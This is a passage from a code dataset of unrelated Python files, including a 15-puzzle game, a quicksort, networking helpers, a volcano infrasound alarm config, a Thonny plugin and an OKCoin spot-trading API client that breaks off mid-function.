pinit.ParamInitializer = Ref(\"exp_global.param_init\", default=bare(pinit.GlorotInitializer))):\n    \"\"\"\n    max_pos: largest embedded position\n    emb_dim: embedding size\n    param_init: how to initialize embedding matrix\n    \"\"\"\n    self.max_pos = max_pos\n    self.emb_dim = emb_dim\n    param_collection = param_collections.ParamManager.my_params(self)\n    dim = (self.emb_dim, max_pos)\n    self.embeddings = param_collection.add_parameters(dim, init=param_init.initializer(dim, is_lookup=True))\n\n  def embed(self, word): raise NotImplementedError(\"Position-embedding for individual words not implemented yet.\")\n  def embed_sent(self, sent_len: numbers.Integral) -> expression_seqs.ExpressionSequence:\n    embeddings = dy.strided_select(dy.parameter(self.embeddings), [1,1], [0,0], [self.emb_dim, sent_len])\n    return expression_seqs.ExpressionSequence(expr_tensor=embeddings, mask=None)\n\n\n","sub_path":"xnmt/modelparts/embedders.py","file_name":"embedders.py","file_ext":"py","file_size_in_byte":20742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449438702","text":"# -*-coding: utf-8 -*-\n\n# 'random' module is used to shuffle field, see:\n# https://docs.python.org/3/library/random.html#random.shuffle\nimport random\n\n\n# Empty tile, there's only one empty cell on a field:\nEMPTY_MARK = 'x'\n\n# Dictionary of possible moves, in the form:\n# key -> delta to move the empty tile on a field.\nMOVES = {\n\t'w': -4,\n\t's': 4,\n\t'a': -1,\n\t'd': 1,\n}\n\n\ndef shuffle_field():\n\t\"\"\"\n\tThis method is used to create a field at the very start of the game.\n\t:return: list with 16 randomly shuffled tiles,\n\tone of which is an empty space.\n\t\"\"\"\n\t# field = [\n\t# \t1, 2, 3, 4, \n\t# \t5, 6, 7, 8, \n\t# \t9, 10, 11, 12, \n\t# \t13, 14, EMPTY_MARK, 15,\n\t# ]\n\tfield = list(range(1, 17))\n\tfield[-1] = EMPTY_MARK\n\trandom.shuffle(field)\n\treturn field\n\n\ndef print_field(field):\n\t\"\"\"\n\tThis method prints the field to the user.\n\t:param field: current field state to be printed.\n\t:return: None\n\t\"\"\"\n\tfor i in range(0, len(field), 4):\n\t\tprint(field[i:i+4])\n\tprint('\\n')\n\n\ndef is_game_finished(field):\n\t\"\"\"\n\tThis method checks if the game is finished.\n\t:param field: current field state.\n\t:return: True if the game is finished, False otherwise.\n\t\"\"\"\n\treturn field == [\n\t\t1, 2, 3, 4, \n\t\t5, 6, 7, 8, \n\t\t9, 10, 11, 12, \n\t\t13, 14, 15, EMPTY_MARK,\n\t]\n
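\n\n# Editor's note (added illustration): the flat list models a 4x4 grid where\n# index = row * 4 + col, so the MOVES deltas above shift the empty tile by one\n# row ('w'/'s' -> -4/+4) or one column ('a'/'d' -> -1/+1); e.g. the blank at\n# index 5 moved with 'd' lands at index 6 (same row, next column).\n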
\n\ndef perform_move(field, key):\n\t\"\"\"\n\tMoves the empty tile inside the field.\n\t:param field: current field state.\n\t:param key: move direction.\n\t:return: new field state (after the move).\n\t:raises: IndexError if the move can't be done.\n\t\"\"\"\n\tindex = field.index(EMPTY_MARK)\n\tdelta = MOVES[key]\n\tif (12 <= index <= 15 and key == 's') or \\\n\t(0 <= index <= 3 and key == 'w') or \\\n\t(index % 4 == 0 and key == 'a') or \\\n\t(index % 4 == 3 and key == 'd'):\n\t\traise IndexError('Move cannot be done!')\n\tnew_index = index + delta\n\tfield[index], field[new_index] = field[new_index], field[index]\n\treturn field\n\n\ndef handle_user_input():\n\t\"\"\"\n\tHandles user input. List of accepted moves:\n\t\t'w' - up,\n\t\t's' - down,\n\t\t'a' - left,\n\t\t'd' - right\n\t:return: current move.\n\t\"\"\"\n\tmessage = 'Make your move {}:'.format(\n\t\t', '.join(MOVES.keys())\n\t)\n\tmove = input(message)\n\twhile move not in MOVES.keys():\n\t\tmove = input(message)\n\treturn move\n\n\ndef main():\n\t\"\"\"\n\tThe main method. It starts when the program is called.\n\tIt also calls other methods.\n\t:return: None\n\t\"\"\"\n\tturns_count = 0\n\tfield = shuffle_field()\n\tprint_field(field)\n\twhile not is_game_finished(field):\n\t\ttry:\n\t\t\tmove = handle_user_input()\n\t\t\tfield = perform_move(field, move)\n\t\t\tprint_field(field)\n\t\texcept IndexError as ex:\n\t\t\tprint(ex)\n\n\n\nif __name__ == '__main__':\n\t# See what this means:\n\t# http://stackoverflow.com/questions/419163/what-does-if-name-main-do\n\tmain()","sub_path":"game_ex2_1.py","file_name":"game_ex2_1.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65960158","text":"\n\"\"\"\nImplement the QuickSort fast sorting algorithm.\n\"\"\"\n\nN = 1000000  # Number of array elements.\n             # Used in the main program to generate an array of random numbers.\n             # For slow sorting algorithms with n**2 asymptotics it is recommended\n             # to use a value of at most 10k.\n             # For fast sorting algorithms with nlog(n) asymptotics,\n             # set the value to 1,000,000.\n\n# Sorting time: 14.171875\n\ndef sort(array):\n    \"\"\" Sort the array.\n    :param array: Input data array that has to be sorted.\n    \"\"\"\n    qsort(array, 0, len(array) - 1)\n
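\n\n# A minimal self-check (editor's sketch, not part of the original):\n#   data = [5, 2, 9, 1]\n#   sort(data)\n#   assert data == [1, 2, 5, 9]\n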
\n\ndef qsort(array, a, b):\n    # 1. Trivial case: [a, b] contains only one element or is empty\n    if a >= b:\n        return\n\n    pivot = array[a + (b - a) // 2]  # pivot element\n    # 2. Partition the input array into two parts so that the left part\n    # contains elements that are less than or equal to the pivot,\n    # and the right part contains elements that are\n    # greater than or equal to the pivot\n    left = a\n    right = b\n\n    while True:\n        while array[left] < pivot:\n            left += 1\n\n        while array[right] > pivot:\n            right -= 1\n\n        if left >= right:\n            break\n\n        array[left], array[right] = array[right], array[left]\n        left += 1\n        right -= 1\n\n    qsort(array, a, right)\n    qsort(array, right + 1, b)\n","sub_path":"labs/L09/task2/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"491598998","text":"def load_addr_list(filename):\n    l = []\n    with open(filename) as f:\n        lines = f.readlines()\n        for line in lines:\n            if line:\n                line = line.strip()\n                if not line.startswith('#') and not line.startswith('//'):\n                    l.append(line)\n    return l\n\n\ndef patch_dns(handler):\n    from urllib3.util import connection\n    _orig_create_connection = connection.create_connection\n\n    def patched_create_connection(address, *args, **kwargs):\n        host, port = address\n        res = _orig_create_connection((handler(host), port), *args, **kwargs)\n        return res\n\n    connection.create_connection = patched_create_connection\n\ndef set_local_proxy():\n    import socket\n    import socks\n    socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, \"127.0.0.1\", 2358)\n    socket.socket = socks.socksocket\n\n\ndef create_socket(addr, default_ipv6=True):\n    import socket\n    host, port = addr\n    res = socket.getaddrinfo(host, port, socket.AF_UNSPEC if default_ipv6 else socket.AF_INET,\n                             socket.SOCK_STREAM, 0, socket.AI_PASSIVE)[0]\n\n    af, socktype, proto, _, sa = res\n\n    s = socket.socket(af, socktype, proto)\n    return s, sa\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636982029","text":"alarm_type = 'Infrasound'\t\t\t# this designates which alarm module will be imported and executed\nalarm_name = 'KENI Infrasound'\t# this is the alarm name sent to icinga and in message alerts\n\n# Infrasound channels list\nSCNL=[\n{'scnl':'KENI.HDF.AV.01'\t, 'sta_lat': 60.6413700\t, 'sta_lon': -151.070200},\n{'scnl':'KENI.HDF.AV.02'\t, 'sta_lat': 60.6404567 , 'sta_lon': -151.070330},\n{'scnl':'KENI.HDF.AV.03'\t, 'sta_lat': 60.6406033\t, 'sta_lon': -151.072020},\n{'scnl':'KENI.HDF.AV.04'\t, 'sta_lat': 60.6412000\t, 'sta_lon': -151.073000},\n{'scnl':'KENI.HDF.AV.05'\t, 'sta_lat': 60.6415300\t, 'sta_lon': -151.072000},\n{'scnl':'KENI.HDF.AV.06'\t, 'sta_lat': 60.6409167 , 'sta_lon': -151.071170},\n]\n\n# Volcano list to be monitored\n# Need volcano name and location for each volcano\n# Azimuthal tolerance is in degrees\n# seismic_scnl is a list of seismic channels to be plotted with infrasound on detect\nVOLCANO=[\n  {'volcano': 'Spurr', 'v_lat': 61.29897, 'v_lon': -152.25122, 'Azimuth_tolerance': 5, 'min_pa': 1.0, 'vmin':0.28, 'vmax':0.4,\n   'seismic_scnl': ['SPCP.BHZ.AV.--','SPCL.BHZ.AV.--','SPU.BHZ.AV.--']},\n\n  {'volcano': 'Redoubt', 'v_lat': 60.48576, 'v_lon': -152.74282, 'Azimuth_tolerance': 5, 'min_pa': 1.0, 'vmin':0.28, 'vmax':0.4,\n   'seismic_scnl': ['RDDF.BHZ.AV.--','RDDF.BHZ.AV.--','RDSO.BHZ.AV.--']},\n\n  {'volcano': 'Iliamna', 'v_lat': 60.03220, 'v_lon': -153.09002, 'Azimuth_tolerance': 5, 'min_pa': 0.8, 'vmin':0.28, 'vmax':0.4,\n   'seismic_scnl': ['ILSW.BHZ.AV.--','ILS.BHZ.AV.--','IVE.BHZ.AV.--']},\n\n  {'volcano': 'Augustine', 'v_lat': 59.36107, 
'v_lon': -153.42938, 'Azimuth_tolerance': 5, 'min_pa': 1.0, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['AUJA.BHZ.AV.--','AUJK.BHZ.AV.--','AUSS.BHZ.AV.--']},\n\n {'volcano': 'Fourpeaked', 'v_lat': 58.7625, 'v_lon': -153.6632, 'Azimuth_tolerance': 5, 'min_pa': 0.5, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['Q19K.BHZ.AV.--','KARR.BHZ.AV.--','KAHG.BHZ.AV.--']},\n\n {'volcano': 'Katmai', 'v_lat': 58.263132, 'v_lon': -155.148067, 'Azimuth_tolerance': 10, 'min_pa': 0.5, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['MGLS.BHZ.AV.--','KABU.BHZ.AV.--','ACH.BHZ.AV.--']},\n]\n\nduration = 3*60 # duration value in seconds\nlatency = 10.0 # seconds between timestamps and end of data window\ntaper_val = 5.0 # seconds to taper beginning and end of trace before filtering\nf1\t\t = 0.5 # minimum frequency for bandpass filter\nf2\t\t = 8.0 # maximum frequency for bandpass filter\n\ndigouti = (1/419430.0)/(0.0275)\t# convert counts to Pressure in Pa (Q330 + Chap Vx2 mics)\nmin_cc = 0.6\t\t\t\t\t# min normalized correlation coefficient to accept\nmin_chan = 3\t\t\t\t\t# minimum # of channels for code to run\ncc_shift_length = 3*100\t\t\t# maximum samples to shift in cross-correlation (usually at 50 sps)\n","sub_path":"alarm_configs/KENI_Infrasound_config.py","file_name":"KENI_Infrasound_config.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"195288468","text":"import os.path\nfrom threading import Thread\nfrom tkinter import messagebox\n\nfrom thonny import get_workbench, get_runner\nimport logging\n\n_server_started = False\n\n\ndef _start_debug_enabled():\n return (\n get_workbench().get_editor_notebook().get_current_editor() is not None\n and \"debug\" in get_runner().get_supported_features()\n )\n\n\ndef start_server():\n try:\n from birdseye import server\n\n server.app.run(\n port=get_workbench().get_option(\"run.birdseye_port\"), debug=False, use_reloader=False\n )\n except Exception:\n logging.getLogger(\"thonny\").exception(\"Problem running Birdseye server\")\n\n\ndef debug_with_birdseye():\n global _server_started\n\n try:\n import birdseye # @UnusedImport\n except ImportError:\n if messagebox.askyesno(\n _(\"About Birdseye\"),\n _(\n \"Birdseye is a Python debugger which needs to be installed separately.\\n\\n\"\n + \"Do you want to open the help page and learn more?\"\n ),\n ):\n get_workbench().open_help_topic(\"birdseye\")\n\n return\n\n if not _server_started:\n _server_started = True\n Thread(target=start_server, daemon=True).start()\n\n os.environ[\"BIRDSEYE_PORT\"] = str(get_workbench().get_option(\"run.birdseye_port\"))\n get_runner().execute_current(\"Birdseye\")\n\n\n# order_key makes the plugin to be loaded later than other same tier plugins\n# This way it gets positioned after main debug commands in the Run menu\nload_order_key = \"zz\"\n\n\ndef load_plugin():\n get_workbench().set_default(\"run.birdseye_port\", 7777)\n get_workbench().add_command(\n \"birdseye\",\n \"run\",\n _(\"Debug current script (birdseye)\"),\n debug_with_birdseye,\n caption=\"birdseye\",\n tester=_start_debug_enabled,\n default_sequence=\"\",\n group=10,\n image=os.path.join(os.path.dirname(__file__), \"..\", \"res\", \"birdseye.png\"),\n )\n","sub_path":"thonny/plugins/birdseye_frontend.py","file_name":"birdseye_frontend.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"51220473","text":"import pandas as 
pd\nimport numpy as np\nimport gettickers as gt\n\n\ndef ticker_streaks(ticker):\n fname = './CSVs/' + ticker + '.csv'\n df = pd.read_csv(fname, header=0,\n usecols=['date', 'adjClose', 'adjVolume'])\n df.drop(0, inplace=True)\n df = df[df['adjVolume'] != 0]\n df['returnFactor'] = 1 + df.adjClose.pct_change(1)\n df['retNextMonth'] = 1/(df.adjClose.pct_change(-4) + 1) - 1\n df['up'] = (df['returnFactor'] > 1).astype(int)\n\n df['switch'] = abs(df['up'] - df['up'].shift(periods=1))\n\n df['strkno'] = df.index\n df.loc[df['switch'] == 0, 'strkno'] = np.nan\n df.loc[1, 'strkno'] = 0\n df['strkno'] = df['strkno'].fillna(method='ffill')\n\n g = df.groupby('strkno').agg(\n startdate=pd.NamedAgg(column='date', aggfunc='min'),\n enddate=pd.NamedAgg(column='date', aggfunc='max'),\n length=pd.NamedAgg(column='date', aggfunc='count'),\n ret=pd.NamedAgg(column='returnFactor',\n aggfunc=lambda x: x.prod() - 1),\n fwd_ret=pd.NamedAgg(column='retNextMonth', aggfunc='last'),\n up=pd.NamedAgg(column='up', aggfunc='max'))\n g.reset_index(inplace=True)\n g.drop('strkno', axis=1, inplace=True)\n g['ticker'] = ticker\n g = g[g.length !=0]\n return g\n\nif __name__ == '__main__':\n allstreaks = pd.concat([ticker_streaks(s) for s in gt.get_tickers()],\n ignore_index=True)\n allstreaks.to_csv('streaks.csv', index=False)\n","sub_path":"strk.py","file_name":"strk.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"329001903","text":"\n\nfrom setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nsetup(\n name='pyCyAMatReader',\n version='0.0.3',\n description='Python interface for the AMatReader Cytoscape app',\n #url='',\n author='Brett Settle',\n #author_email='',\n license='MIT',\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n keywords='Cytoscape',\n\tpackages=find_packages(),\n #install_requires=['peppercorn'],\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. 
Entry points provide cross-platform support and allow\n    # pip to create the appropriate form of executable for the target platform.\n    #entry_points={\n    #    'console_scripts': [\n    #        'newmodule=newmodule:main'\n    #        #'sample=sample:main',\n    #    ],\n    #},\n)\n","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"241375631","text":"# Write a program to read through mbox-short.txt and figure out who has sent the greatest number of mail messages.\n# The program looks for 'From ' lines and takes the second word of those lines as the person who sent the mail.\n# The program creates a Python dictionary that maps the sender's mail address to a count of the number of times they appear in the file.\n# After the dictionary is produced, the program reads through the dictionary using a maximum loop to find the most prolific committer.\n\n# fname = input(\"Enter file name: \")\n# if len(fname) < 1 : fname = \"mbox-short.txt\"\n\nfh = open(\"mbox-short.txt\")\ncount = 0\nlst = list()\ndic = dict()\nfor line in fh:\n    line = line.rstrip()\n    if not line.startswith(\"From \"): continue\n    lst = line.split()\n    email = lst[1]\n    dic[email] = dic.get(email,0)+1\n\nlargest = None\nfor a in dic:\n    if largest is None or dic[a] > largest:\n        largest = dic[a]\n        address = a\n\nprint(address,largest)\n","sub_path":"Chap9_1.py","file_name":"Chap9_1.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"408823108","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Client for the OKCoin spot REST API.\nfrom HttpMD5Util import buildMySign,httpGet,httpPost\nimport json\n\"\"\"\nWe need to distinguish two kinds of exceptions:\none where the return result can never be used, in which case we raise criticalException,\nand one where some entries are errors while others are usable, in which case we raise trivialException.\nWe also need to decide where to raise the exception:\nin SpotAPI or in the application program?\n\"\"\"\n__all__ = ['OKCoinSpotMarketData', 'OKCoinSpotAccount', 'OKCoinSpotTrade']\nclass OKCoinSpotMarketData:\n    \"\"\"\n    Spot Market Data\n    \"\"\"\n    def __init__(self,url,apikey,secretkey):\n        self.__url = url\n        self.__apikey = apikey\n        self.__secretkey = secretkey\n\n    # Get OKCoin spot ticker information\n    def ticker(self,symbol=''):\n        \"\"\"\n        @return {'date': 1499387332, \n                 'ticker': {'buy': 18110.0, 'high': 18282.0, 'last': 18110.0, 'low': 17950.0, 'sell': 18119.98, 'vol': 6255.201}}\n        \"\"\"\n        TICKER_RESOURCE = \"/api/v1/ticker.do\"\n        params=''\n        if symbol:\n            params += '&symbol=' + symbol if params else 'symbol=' +symbol\n        data = httpGet(self.__url,TICKER_RESOURCE,params)\n        data['date'] = int(data['date'])\n        for k in data['ticker'].keys():\n            data['ticker'][k] = float(data['ticker'][k])\n        return data\n\n    # Get OKCoin spot market depth information\n    # 'merge' appears to control price precision; the default depth() returns 200 depth levels.\n    # Raw ask prices decrease down the list and bid prices increase, so asks are reversed below.\n    # Update interval is roughly 0.3s ~ 3s, sometimes up to 6s.\n    def depth(self,symbol='btc_cny',size = 0,merge = 0):\n        \"\"\"\n        @return orderbook\n        @type: dict, {'asks': a list of [price (float), amount (int)], \n                      'bids': a list of [price, amount]}. 
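\n\n        Hedged usage sketch (editor's addition; \"md\" is a hypothetical OKCoinSpotMarketData instance,\n        and the ordering assumes the comments above):\n            book = md.depth('btc_cny')\n            best_ask = book['asks'][0][0]  # ascending after the reversal below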
\n        asks=list(reversed(orderbook['asks']))\n        \"\"\"\n        DEPTH_RESOURCE = \"/api/v1/depth.do\"\n        params='symbol=%s'%(symbol)\n        if size:\n            params += '&size=' + str(size)\n        if merge:\n            params += '&merge=' + str(merge)\n        data = httpGet(self.__url,DEPTH_RESOURCE,params)\n        if 'asks' not in data:\n            print(data)\n        data['asks'] = list(reversed(data['asks']))\n        return data\n\n    # Get the most recent 600 OKCoin spot trades\n    # since\n    # These 600 trades span 10~20 min on average, sometimes only 3~5 min.\n    # The gap between two adjacent trades ranges from 0s to 7s, up to 1 min at most.\n    # The time to obtain a new tid, i.e. the interval between new trades, hovers around 0.2s\n    # at the low end and can reach 1s, 6s or even 12s (the same as the adjacent-trade interval test above).\n    def trades(self,symbol = 'btc_cny', since = 0):\n        \"\"\"\n        @para since, return trades information from this tid. This tid is NOT included.\n        @return trades: default length is 60, trades[-1] is the latest trade info\n        @type: a list of {'amount': 0.028, 'date': 1499386972, 'date_ms': 1499386972000, 'price': 18112.0, 'tid': 7580841263, 'type': 'sell'}.\n\n        @date_ms = date * 1000, wouldn't be more concise than date\n        \"\"\"\n        TRADES_RESOURCE=\"/api/v1/trades.do\"\n        params='symbol={}'.format(symbol)\n        if since:\n            params += '&since=' + str(since) if params else 'since=' +since\n        trades = httpGet(self.__url,TRADES_RESOURCE,params)\n        for trade in trades:\n            trade['amount'] = float(trade['amount'])\n            trade['price'] = float(trade['price'])\n        return trades\n\n    # Get OKCoin spot historical K-line (candlestick) data\n    def kline(self, symbol, dataType='1min', size=None, since=0):\n        \"\"\"\n        @para interval, 1min, 3min, 5min, 15min, 30min, 1day, 3day, 1week, 1hour, 2hour, 4hour, 6hour, 12hour\n        @return a list of [timestamp, open, high, low, close, volume]\n        \"\"\"\n        KLINE = \"/api/v1/kline.do\"\n        params='symbol={s}&type={t}'.format(s=symbol,t=dataType)\n        if size:\n            params += '&size=' + str(size) if params else 'size=' +str(size)\n        if since:\n            params += '&since='+str(since) if params else 'since='+str(since)\n        return httpGet(self.__url,KLINE,params)\n\n    # Public historical trade information\n    def trade_history(self,symbol,since):\n        TRADE_HISTORY=\"/api/v1/trade_history.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n            'since':since\n        }\n\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,TRADE_HISTORY,params)\n\n\n#####################################################################################\nclass OKCoinSpotAccount:\n    \"\"\"\n    Spot Account Info\n    \"\"\"\n    def __init__(self,url,apikey,secretkey):\n        self.__url = url\n        self.__apikey = apikey\n        self.__secretkey = secretkey\n\n    # Get the user's spot account information\n    def userinfo(self):\n        \"\"\"\n        @return userinfo,\n        type dict, {'info': {'funds': {'asset': {'net': 3298.89, 'total': '3298.89'}, \n                                       'free': {'btc': 0.0, 'cny': 298.89, 'eth': 0.0, 'ltc': 0.0}, \n                                       'freezed': {'btc': 0.0, 'cny': 3000.0, 'eth': 0.0, 'ltc': 0.0}}}, \n                    'result': True}\n        \"\"\"\n        USERINFO_RESOURCE = \"/api/v1/userinfo.do\"\n        params ={}\n        params['api_key'] = self.__apikey\n        params['sign'] = buildMySign(params,self.__secretkey)\n        data = httpPost(self.__url,USERINFO_RESOURCE,params)\n        for key,val in data['info']['funds'].items():  # asset, free, freezed\n            for y in val.keys():  # net, total\n                val[y] = float(val[y])\n        return data\n\n    # Query spot order information\n    def order_info(self,symbol,order_id):\n        \"\"\"\n        @para symbol, string, 'btc_cny'/'ltc_cny'/'eth_cny'\n        @para order_id, long, -1 all open orders; if order_id is a specific id, return this order\n\n        @return {'orders': [{'amount': 10, 'avg_price': 0, 'create_date': 1499430915000, \n                             'deal_amount': 0, 'order_id': 11326282, 'orders_id': 11326282, \n                             'price': 1, 'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}], \n                 'result': True}\n        @return 
status -1 canceled, 0 open, 1 partial filled, 2 full filled, 4 in-cancel\n\n        OR \n        @return {'error_code': 10001, 'result': False}\n        \"\"\"\n        ORDER_INFO_RESOURCE = \"/api/v1/order_info.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n            'order_id':order_id\n        }\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,ORDER_INFO_RESOURCE,params)\n\n    # Query spot order information in batch\n    def orders_info(self,type,symbol,order_id):\n        \"\"\"\n        @para type, int, 0 open order, 1 crossed order\n        @para order_id, string, order ids separated by ',' \n\n        @return dict [All values are their own type, int, float, string etc.]\n        {'orders': [{'amount': 10000, 'avg_price': 0, 'create_date': 1499358526000, \n                     'deal_amount': 0, 'order_id': 10720334, 'price': 0.1, \n                     'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}, \n                    {'amount': 10000, 'avg_price': 0, 'create_date': 1499358015000, \n                     'deal_amount': 0, 'order_id': 10717356, 'price': 0.1, \n                     'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}], \n         'result': True}\n        @return status -1 canceled, 0 open, 1 partial filled, 2 full filled, 4 in-cancel\n        \"\"\"\n        ORDERS_INFO_RESOURCE = \"/api/v1/orders_info.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n            'order_id':order_id,\n            'type':type\n        }\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,ORDERS_INFO_RESOURCE,params)\n\n    # Get spot order history for the last two days\n    def order_history(self, symbol, status, current_page, page_length):\n        \"\"\"\n        @para status, 0 open, 1 crossed\n        @para current_page, current page number\n        @para page_length, number of every page\n        @return\n        {'current_page': 1, \n         'orders': [{'amount': 10, 'avg_price': 0, 'create_date': 1499430915000, \n                     'deal_amount': 0, 'order_id': 11326282, 'price': 1, \n                     'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}, \n                    {'amount': 10, 'avg_price': 0, 'create_date': 1499358526000, \n                     'deal_amount': 0, 'order_id': 10720334, 'price': 0.1, \n                     'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}, \n                    {'amount': 10, 'avg_price': 0, 'create_date': 1499358508000, \n                     'deal_amount': 0, 'order_id': 10720260, 'price': 0.1, \n                     'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}, \n                    {'amount': 10, 'avg_price': 0, 'create_date': 1499358015000, \n                     'deal_amount': 0, 'order_id': 10717356, 'price': 0.1, \n                     'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}], \n         'page_length': 10, \n         'result': True, \n         'total': 0}\n        \"\"\"\n        ORDER_HISTORY_RESOURCE = \"/api/v1/order_history.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n            'status':status,\n            'current_page':current_page,\n            'page_length':page_length\n        }\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,ORDER_HISTORY_RESOURCE,params)\n\n    # Get the top 10 levels of the lending depth\n    def lend_depth(self,symbol):\n        LEND_DEPTH = \"/api/v1/lend_depth.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n        }\n\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,LEND_DEPTH,params)\n\n    # Query borrowing information\n    def borrows_info(self,symbol):\n        \"\"\"\n        {'borrow_btc': 0, 'borrow_cny': 0, 'borrow_ltc': 0, 'can_borrow': 0, \n         'interest_btc': 0, 'interest_cny': 0, 'interest_ltc': 0, 'result': True, \n         'today_interest_btc': 0, 'today_interest_cny': 0, 'today_interest_ltc': 0}\n        \"\"\"\n        BORROWS_INFO = \"/api/v1/borrows_info.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n        }\n\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,BORROWS_INFO,params)\n\n    # Borrow order records\n    def borrow_order_info(self,borrow_id):\n        BORROW_ORDER_INFO = 
\"/api/v1/borrow_order_info.do\"\n params = {\n 'api_key':self.__apikey,\n 'borrow_id':borrow_id\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,BORROW_ORDER_INFO,params)\n\n #未全款列表\n def unrepayments_info(self,symbol,current_page,page_length):\n UNREPAYMENTS_INFO = \"/api/v1/unrepayments_info.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'current_page':current_page,\n 'page_length':page_length\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,UNREPAYMENTS_INFO,params)\n\n #充值提现记录\n def account_records(self,symbol,type,current_page,page_length):\n ACCOUNT_RECORDS = \"/api/v1/account_records.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'type':type,\n 'current_page':current_page,\n 'page_length':page_length\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,ACCOUNT_RECORDS,params)\n\n\n#####################################################################################\nclass OKCoinSpotTrade:\n \"\"\"\n Spot Trade Execution\n \"\"\"\n def __init__(self,url,apikey,secretkey):\n self.__url = url\n self.__apikey = apikey\n self.__secretkey = secretkey\n\n #现货交易\n def trade(self,symbol,type,price=0.0,amount=0.0):\n \"\"\"\n @para type, 'sell'/'buy'\n @return tradeResult\n @type {'order_id': 10717356 (int), 'result': True}\n \"\"\"\n TRADE_RESOURCE = \"/api/v1/trade.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'type':type\n }\n if price:\n params['price'] = price\n if amount:\n params['amount'] = amount\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,TRADE_RESOURCE,params)\n\n def __batch_trade(self, params):\n \"\"\"\n @return \n {\n \"order_info\":[\n {\"order_id\":41724206},\n {\"error_code\":10011,\"order_id\":-1},\n {\"error_code\":10014,\"order_id\":-1}\n ],\n \"result\":true\n }\n \"\"\"\n BATCH_TRADE_RESOURCE = \"/api/v1/batch_trade.do\"\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,BATCH_TRADE_RESOURCE,params)\n\n # 现货批量下单(文档里说可以在orders_data里精细控制buy/sell,但实际中返回10008非法参数,问题没有解决;)\n # 这里直接要求返回data里有key order_info\n def batch_trade(self, symbol, type, orders_data):\n \"\"\"\n @para type, 'buy'/'sell'\n @orders_data [(1053.82, 6, 'buy'), (1053.43, 6, 'buy'), \n (1053.43, 1, 'sell'), (1053.43, 6, 'sell')], \n allow more than 5 now\n\n @return [{'error_code': 10000, 'result': False}, \n {'order_id': 11994552}, {'order_id': 11994553}, \n {'order_id': 11994554}, {'order_id': 11994555}, \n {'order_id': 11994556}, {'order_id': 11994557}]\n \"\"\"\n leng = len(orders_data)\n result = {'order_info':[], }\n ret = []\n i = 0\n while i < leng:\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'type':type,\n }\n end = (i + 5) if (i + 5 < leng) else leng\n tmp_lst = []\n for order in orders_data[i : end]:\n if len(order) == 3:\n tmp_lst.append('{' + 'price:{},amount:{},type:{}'.format(order[0],order[1],order[2]) + '}')\n else:\n tmp_lst.append('{' + 'price:{},amount:{}'.format(order[0],order[1]) + '}')\n params['orders_data'] = '[{}]'.format(','.join(tmp_lst))\n data = self.__batch_trade(params)\n if 'order_info' in data:\n ret.extend(data['order_info'])\n else:\n 